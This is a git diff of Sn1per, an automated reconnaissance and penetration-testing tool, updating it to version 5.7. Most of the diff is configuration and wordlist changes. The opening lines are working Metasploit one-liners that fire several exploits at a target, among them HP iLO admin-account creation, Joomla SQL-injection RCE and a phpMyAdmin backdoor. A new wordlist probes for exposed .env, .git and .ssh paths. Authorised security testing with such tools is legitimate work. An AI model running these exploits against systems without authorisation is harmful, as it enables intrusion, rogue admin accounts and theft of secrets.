msfconsole -q -x "use admin/hp/hp_ilo_create_admin_account; setg RHOST "$TARGET"; setg RPORT "$PORT"; set SSL true; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING MS15-034 SYS MEMORY DUMP METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT "$PORT"; set SSL true; set WAIT 2; run; exit;"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/ms15_034_http_sys_memory_dump; setg RHOSTS \"$TARGET\"; set RPORT "$PORT"; set SSL true; set WAIT 2; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING BADBLUE PASSTHRU METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
|
||||
msfconsole -q -x "use exploit/windows/http/badblue_passthru; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHP CGI ARG INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
|
||||
msfconsole -q -x "use exploit/multi/http/php_cgi_arg_injection; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
|
||||
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST \"$TARGET\"; set RPORT "$PORT"; set SSL true; run; back; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING PHPMYADMIN METASPLOIT EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
|
||||
msfconsole -q -x "use exploit/multi/http/phpmyadmin_3522_backdoor; setg RHOSTS "$TARGET"; setg RHOST "$TARGET"; setg RPORT "$PORT"; run; use exploit/unix/webapp/phpmyadmin_config; run; use multi/http/phpmyadmin_preg_replace; run; exit;"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING SHELLSHOCK EXPLOIT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
|
|||
104
sniper
104
sniper
|
|
@ -1,57 +1,19 @@
|
|||
#!/bin/bash
|
||||
# + -- --=[Sn1per by 1N3@CrowdShield
|
||||
# + -- --=[http://xerosecurity.com
|
||||
#
|
||||
# + -- --=[Sn1per by @xer0dayz
|
||||
# + -- --=[https://xerosecurity.com
|
||||
#
|
||||
|
||||
VER="5.6"
|
||||
BROWSER="firefox" # SET DEFAULT BROWSER
|
||||
VER="5.7"
|
||||
INSTALL_DIR="/usr/share/sniper"
|
||||
PLUGINS_DIR="$INSTALL_DIR/plugins"
|
||||
WEB_BRUTE_QUICK="$INSTALL_DIR/wordlists/toplist-quick-sorted.txt"
|
||||
WEB_BRUTE_TOPLIST="$INSTALL_DIR/wordlists/toplist-sorted.txt"
|
||||
WEB_BRUTE_FULL="$INSTALL_DIR/wordlists/toplist-full-sorted.txt"
|
||||
WEB_BRUTE_INSANE="$INSTALL_DIR/wordlists/toplist-insane-sorted.txt"
|
||||
DOMAINS_DEFAULT="$INSTALL_DIR/wordlists/domains-all.txt"
|
||||
DOMAINS_FULL="$INSTALL_DIR/wordlists/domains-insane.txt"
|
||||
CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py"
|
||||
SAMRDUMP="$INSTALL_DIR/bin/samrdump.py"
|
||||
DNSDICT6="$INSTALL_DIR/bin/dnsdict6"
|
||||
INURLBR="$INSTALL_DIR/bin/inurlbr.php"
|
||||
USER_FILE="$PLUGIN_DIR/brutex/wordlists/simple-users.txt"
|
||||
PASS_FILE="$PLUGIN_DIR/wordlists/password.lst"
|
||||
DNS_FILE="$PLUGIN_DIR/brutex/wordlists/namelist.txt"
|
||||
QUICK_PORTS="21,22,23,25,53,80,110,137,138,139,161,162,443,445,512,513,514,1433,3306,4444,5555,5432,5555,5900,5901,6667,7001,8080,8888,8000,10000"
|
||||
DEFAULT_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049"
|
||||
DEFAULT_TCP_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535"
|
||||
DEFAULT_UDP_PORTS="53,67,68,69,88,123,161,162,137,138,139,389,520,2049"
|
||||
THREADS="30"
|
||||
OKBLUE='\033[94m'
|
||||
OKRED='\033[91m'
|
||||
OKGREEN='\033[92m'
|
||||
OKORANGE='\033[93m'
|
||||
RESET='\e[0m'
|
||||
REGEX='^[0-9]+$'
|
||||
|
||||
# DEFAULT SETTINGS
|
||||
AUTOBRUTE="0"
|
||||
FULLNMAPSCAN="0"
|
||||
OSINT="0"
|
||||
ENABLE_AUTO_UPDATES="1"
|
||||
REPORT="1"
|
||||
LOOT="1"
|
||||
|
||||
# PLUGINS
|
||||
SUBLIST3R="1"
|
||||
AMASS="1"
|
||||
SUBFINDER="1"
|
||||
DNSCAN="0"
|
||||
CRTSH="1"
|
||||
SUBOVER="1"
|
||||
CLOUDHUNTER="0"
|
||||
SSL="1"
|
||||
PASSIVE_SPIDER="1"
|
||||
BLACKWIDOW="1"
|
||||
METASPLOIT_IMPORT="0"
|
||||
# LOAD SNIPER CONFIGURATION FILE
|
||||
if [ -f ~/.sniper.conf ]; then
|
||||
source ~/.sniper.conf
|
||||
echo -e "$OKBLUE[*] Loaded configuration file from ~/.sniper.conf [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
else
|
||||
source $INSTALL_DIR/sniper.conf
|
||||
echo -e "$OKBLUE[*] Loaded configuration file from $INSTALL_DIR/sniper.conf [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
|
||||
fi
|
||||
|
||||
DISTRO=$(cat /etc/*-release | grep DISTRIB_ID= | cut -d'=' -f2)
|
||||
|
||||
|
|
@ -65,8 +27,8 @@ function help {
|
|||
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
||||
echo -e "$OKRED /_/ $RESET"
|
||||
echo ""
|
||||
echo -e "$OKORANGE + -- --=[http://xerosecurity.com$RESET"
|
||||
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
|
||||
echo -e "$OKORANGE + -- --=[https://xerosecurity.com$RESET"
|
||||
echo -e "$OKORANGE + -- --=[sniper v$VER by @xer0dayz$RESET"
|
||||
echo ""
|
||||
echo ' [*] NORMAL MODE'
|
||||
echo ' sniper -t|--target <TARGET>'
|
||||
|
|
@ -134,8 +96,8 @@ function logo {
|
|||
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
||||
echo -e "$OKRED /_/ $RESET"
|
||||
echo ""
|
||||
echo -e "$OKORANGE + -- --=[http://xerosecurity.com$RESET"
|
||||
echo -e "$OKORANGE + -- --=[sniper v$VER by 1N3$RESET"
|
||||
echo -e "$OKORANGE + -- --=[https://xerosecurity.com$RESET"
|
||||
echo -e "$OKORANGE + -- --=[sniper v$VER by @xer0dayz$RESET"
|
||||
echo ""
|
||||
}
|
||||
|
||||
|
|
@ -314,12 +276,32 @@ function init {
|
|||
mkdir $LOOT_DIR/nmap 2> /dev/null
|
||||
mkdir $LOOT_DIR/reports 2> /dev/null
|
||||
mkdir $LOOT_DIR/output 2> /dev/null
|
||||
mkdir $LOOT_DIR/credentials 2> /dev/null
|
||||
mkdir $LOOT_DIR/vulnerabilities 2> /dev/null
|
||||
mkdir $LOOT_DIR/exploits 2> /dev/null
|
||||
mkdir $LOOT_DIR/web 2> /dev/null
|
||||
mkdir $LOOT_DIR/notes 2> /dev/null
|
||||
mkdir $LOOT_DIR/scans 2> /dev/null
|
||||
TARGET="$(echo $TARGET | sed 's/https:\/\///g' | sed 's/http:\/\///g')"
|
||||
/etc/init.d/metasploit start 2> /dev/null > /dev/null 2>&1 &
|
||||
msfdb start 2> /dev/null > /dev/null
|
||||
|
||||
if [ "$AUTOBRUTE" == "1" ]; then
|
||||
touch $LOOT_DIR/scans/$TARGET-autobrute.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [ "$FULLNMAPSCAN" == "1" ]; then
|
||||
touch $LOOT_DIR/scans/$TARGET-fullnmapscan.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [ "$OSINT" == "1" ]; then
|
||||
touch $LOOT_DIR/scans/$TARGET-osint.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
if [ "$RECON" == "1" ]; then
|
||||
touch $LOOT_DIR/scans/$TARGET-recon.txt 2> /dev/null
|
||||
fi
|
||||
|
||||
}
|
||||
|
||||
function loot {
|
||||
|
|
@ -353,9 +335,9 @@ function loot {
|
|||
for a in `ls sniper-*.txt 2>/dev/null`;
|
||||
do
|
||||
# HTML OUTPUT
|
||||
cat "$a" | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" > $LOOT_DIR/reports/$a.txt
|
||||
echo "$a" | aha > $LOOT_DIR/reports/$a.html 2> /dev/null
|
||||
cat "$a" | aha >> $LOOT_DIR/reports/$a.html 2> /dev/null
|
||||
cat "$a" 2> /dev/null | sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" 2> /dev/null > $LOOT_DIR/reports/$a.txt 2> /dev/null
|
||||
echo "$a" 2> /dev/null | aha 2> /dev/null > $LOOT_DIR/reports/$a.html 2> /dev/null
|
||||
cat "$a" 2> /dev/null | aha 2> /dev/null >> $LOOT_DIR/reports/$a.html 2> /dev/null
|
||||
#$INSTALL_DIR/bin/pyText2pdf.py -o $LOOT_DIR/reports/$a.pdf $LOOT_DIR/reports/$a.txt 2> /dev/null > /dev/null
|
||||
done
|
||||
cd ..
|
||||
|
|
@ -366,6 +348,13 @@ function loot {
|
|||
sort -u $LOOT_DIR/domains/targets.txt > $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null
|
||||
diff $LOOT_DIR/domains/targets-all-sorted.txt $LOOT_DIR/domains/domains-all-sorted.txt | grep \> | awk '{print $2}' > $LOOT_DIR/domains/targets-all-unscanned.txt
|
||||
|
||||
|
||||
echo -e "$OKORANGE + -- --=[Removing blank screenshots...$RESET"
|
||||
cd $LOOT_DIR/screenshots/
|
||||
find $LOOT_DIR/screenshots/ -type f -size -9000c -exec rm -f {} \;
|
||||
cd $LOOT_DIR
|
||||
|
||||
|
||||
SNIPER_PRO=$INSTALL_DIR/pro.sh
|
||||
if [ -f $SNIPER_PRO ]; then
|
||||
echo -e "$OKORANGE + -- --=[Loading Sn1per Professional...$RESET"
|
||||
|
|
@ -419,6 +408,7 @@ fi
|
|||
|
||||
source modes/discover.sh
|
||||
source modes/flyover.sh
|
||||
source modes/fullportonly.sh
|
||||
source modes/web.sh
|
||||
source modes/webporthttp.sh
|
||||
source modes/webporthttps.sh
|
||||
|
|
|
|||
|
|
@ -0,0 +1,50 @@
|
|||
BROWSER="firefox" # SET DEFAULT BROWSER
|
||||
INSTALL_DIR="/usr/share/sniper"
|
||||
PLUGINS_DIR="$INSTALL_DIR/plugins"
|
||||
WEB_BRUTE_FAST="$INSTALL_DIR/wordlists/toplist-fast-sorted.txt"
|
||||
WEB_BRUTE_QUICK="$INSTALL_DIR/wordlists/toplist-quick-sorted.txt"
|
||||
WEB_BRUTE_TOPLIST="$INSTALL_DIR/wordlists/toplist-sorted.txt"
|
||||
WEB_BRUTE_FULL="$INSTALL_DIR/wordlists/toplist-sorted.txt"
|
||||
WEB_BRUTE_INSANE="$INSTALL_DIR/wordlists/toplist-sorted.txt"
|
||||
DOMAINS_DEFAULT="$PLUGINS_DIR/dnscan/subdomains-10000.txt"
|
||||
DOMAINS_FULL="$INSTALL_DIR/wordlists/domains-insane.txt"
|
||||
CMSMAP="/usr/share/sniper/plugins/CMSmap/cmsmap.py"
|
||||
THEHARVESTER="/usr/share/theharvester/theharvester.py"
|
||||
SAMRDUMP="$INSTALL_DIR/bin/samrdump.py"
|
||||
DNSDICT6="$INSTALL_DIR/bin/dnsdict6"
|
||||
INURLBR="$INSTALL_DIR/bin/inurlbr.php"
|
||||
USER_FILE="$PLUGIN_DIR/brutex/wordlists/simple-users.txt"
|
||||
PASS_FILE="$PLUGIN_DIR/wordlists/password.lst"
|
||||
DNS_FILE="$PLUGIN_DIR/brutex/wordlists/namelist.txt"
|
||||
QUICK_PORTS="21,22,23,25,53,80,110,137,138,139,161,162,443,445,512,513,514,1433,3306,4444,5555,5432,5555,5900,5901,6667,7001,8080,8888,8000,10000"
|
||||
DEFAULT_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,67,68,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535,U:53,U:67,U:68,U:69,U:88,U:161,U:162,U:137,U:138,U:139,U:389,U:520,U:2049"
|
||||
DEFAULT_TCP_PORTS="1,7,9,13,19,21-23,25,37,42,49,53,69,79-81,85,88,105,109-111,113,123,135,137-139,143,161,162,179,222,264,384,389,402,407,443-446,465,500,502,512-515,523-524,540,548,554,587,617,623,631,655,689,705,771,783,831,873,888,902,910,912,921,993,995,998-1000,1024,1030,1035,1090,1098-1103,1128-1129,1158,1199,1211,1220,1234,1241,1300,1311,1352,1433-1435,1440,1471,1494,1521,1530,1533,1581-1582,1604,1720,1723,1755,1811,1900,2000-2001,2049,2067,2100,2103,2121,2199,2207,2222,2323,2362,2380-2381,2525,2533,2598,2638,2809,2947,2967,3000,3037,3050,3057,3128,3200,3217,3273,3299,3306,3310,3333,3389,3460,3465,3500,3628,3632,3690,3780,3790,3817,3900,4000,4322,4433,4444-4445,4659,4672,4679,4800,4848,5000,5009,5038,5040,5051,5060-5061,5093,5168,5227,5247,5250,5351,5353,5355,5400,5405,5432-5433,5466,5498,5520-5521,5554-5555,5560,5580,5631-5632,5666,5800,5814,5900-5910,5920,5984-5986,5999-6000,6050,6060,6070,6080,6082,6101,6106,6112,6161,6262,6379,6405,6502-6504,6542,6660-6661,6667,6789,6905,6988,6996,7000-7001,7021,7071,7080,7144,7181,7210,7272,7414,7426,7443,7510,7547,7579-7580,7700,7770,7777-7778,7787,7800-7801,7878-7879,7890,7902,8000-8001,8008,8014,8020,8023,8028,8030,8050-8051,8080-8082,8085-8088,8090-8091,8095,8101,8161,8180,8205,8222,8300,8303,8333,8400,8443-8445,8503,8642,8686,8701,8787,8800,8812,8834,8880,8888-8890,8899,8901-8903,8980,8999-9005,9010,9050,9080-9081,9084,9090,9099-9100,9111,9152,9200,9256,9300,9390-9391,9495,9500,9711,9788,9809-9815,9855,9875,9910,9991,9999-10001,10008,10050-10051,10080,10098-10099,10162,10202-10203,10443,10616,10628,11000-11001,11099,11211,11234,11333,11460,12000,12174,12203,12221,12345,12397,12401,13013,13364,13500,13838,14000,14330,15000-15001,15200,16000,16102,16992,17185,17200,18881,18980,19300,19810,20000,20010,20031,20034,20101,20111,20171,20222,22222,23423,23472,23791,23943,25000,25025,26000,26122,26256,27000,27015,27017,27888,27960,28222,28784,30000,30718,31001,31099,32022,32764,32913,33000,34205,34443,37718,37777,38080,38292,40007,41025,41080,41523-41524,44334,44818,45230,46823-46824,47001-47002,48080,48899,49152,50000-50004,50013,50050,50500-50504,52302,52869,53413,55553,57772,62078,62514,65535"
|
||||
DEFAULT_UDP_PORTS="53,67,68,69,88,123,161,162,137,138,139,389,520,2049"
|
||||
THREADS="30"
|
||||
OKBLUE='\033[94m'
|
||||
OKRED='\033[91m'
|
||||
OKGREEN='\033[92m'
|
||||
OKORANGE='\033[93m'
|
||||
RESET='\e[0m'
|
||||
REGEX='^[0-9]+$'
|
||||
|
||||
# DEFAULT SETTINGS
|
||||
AUTOBRUTE="0"
|
||||
FULLNMAPSCAN="0"
|
||||
OSINT="0"
|
||||
ENABLE_AUTO_UPDATES="1"
|
||||
REPORT="1"
|
||||
LOOT="1"
|
||||
METASPLOIT_IMPORT="0"
|
||||
|
||||
# PLUGINS
|
||||
SUBLIST3R="1"
|
||||
AMASS="1"
|
||||
SUBFINDER="1"
|
||||
DNSCAN="1"
|
||||
CRTSH="1"
|
||||
SUBOVER="1"
|
||||
CLOUDHUNTER="0"
|
||||
SSL="1"
|
||||
PASSIVE_SPIDER="1"
|
||||
BLACKWIDOW="1"
|
||||
|
|
@ -1,6 +1,6 @@
|
|||
#!/bin/bash
|
||||
# Uninstall script for sn1per
|
||||
#
|
||||
# Uninstall script for Sn1per
|
||||
# Created by @xer0dayz - https://xerosecurity.com
|
||||
# VARS
|
||||
OKBLUE='\033[94m'
|
||||
OKRED='\033[91m'
|
||||
|
|
@ -15,7 +15,7 @@ echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
|
|||
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
|
||||
echo -e "$OKRED /_/ $RESET"
|
||||
echo -e "$RESET"
|
||||
echo -e "$OKORANGE + -- --=[http://xerosecurity.com$RESET"
|
||||
echo -e "$OKORANGE + -- --=[https://xerosecurity.com$RESET"
|
||||
echo ""
|
||||
|
||||
INSTALL_DIR=/usr/share/sniper
|
||||
|
|
|
|||
|
|
@ -1,4 +1,3 @@
|
|||
|
||||
@
|
||||
*
|
||||
0
|
||||
|
|
@ -273570,6 +273569,7 @@ ns2.aconet.it.
|
|||
ns2b
|
||||
ns2.barrie
|
||||
ns2.cc
|
||||
ns2.cl
|
||||
ns2.cl.bellsouth.net.
|
||||
ns2.cloud
|
||||
ns2.cnpdns.co.uk.
|
||||
|
|
@ -273616,6 +273616,7 @@ ns37
|
|||
ns38
|
||||
ns39
|
||||
ns3a
|
||||
ns3.cl
|
||||
ns3.cl.bellsouth.net.
|
||||
ns3.cnpdns.co.uk.
|
||||
ns3.ecircle.com.
|
||||
|
|
@ -293534,6 +293535,7 @@ quasimoto
|
|||
quasit
|
||||
quasituttogratis-guadagna
|
||||
quat
|
||||
quatro
|
||||
quatro.oweb.com.
|
||||
quattro
|
||||
quaver
|
||||
|
|
|
|||
File diff suppressed because it is too large
Load Diff
|
|
@ -0,0 +1,35 @@
|
|||
index
|
||||
index.asp
|
||||
index.html
|
||||
index.htm
|
||||
index.jsp
|
||||
index.aspx
|
||||
index.php
|
||||
sitemap.xml
|
||||
robots.txt
|
||||
cgi-bin
|
||||
phpmyadmin
|
||||
phpMyAdmin
|
||||
.env
|
||||
.git
|
||||
.svn
|
||||
.bashrc
|
||||
.ssh
|
||||
wordpress
|
||||
wp
|
||||
images
|
||||
img
|
||||
css
|
||||
blog
|
||||
upload
|
||||
uploads
|
||||
scripts
|
||||
api
|
||||
home
|
||||
user
|
||||
users
|
||||
admin
|
||||
Admin
|
||||
data
|
||||
portal
|
||||
js
|
||||
|
|
@ -1,4 +1,10 @@
|
|||
|
||||
status_.cgi
|
||||
/Data/
|
||||
/Data/Log/
|
||||
/GreenCMS-beta/
|
||||
/GreenCMS-beta/Data/Log
|
||||
status_.cgi
|
||||
Telerik.Web.UI.DialogHandler.aspx
|
||||
_
|
||||
__
|
||||
.
|
||||
|
|
|
|||
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
File diff suppressed because it is too large
Load Diff
Loading…
Reference in New Issue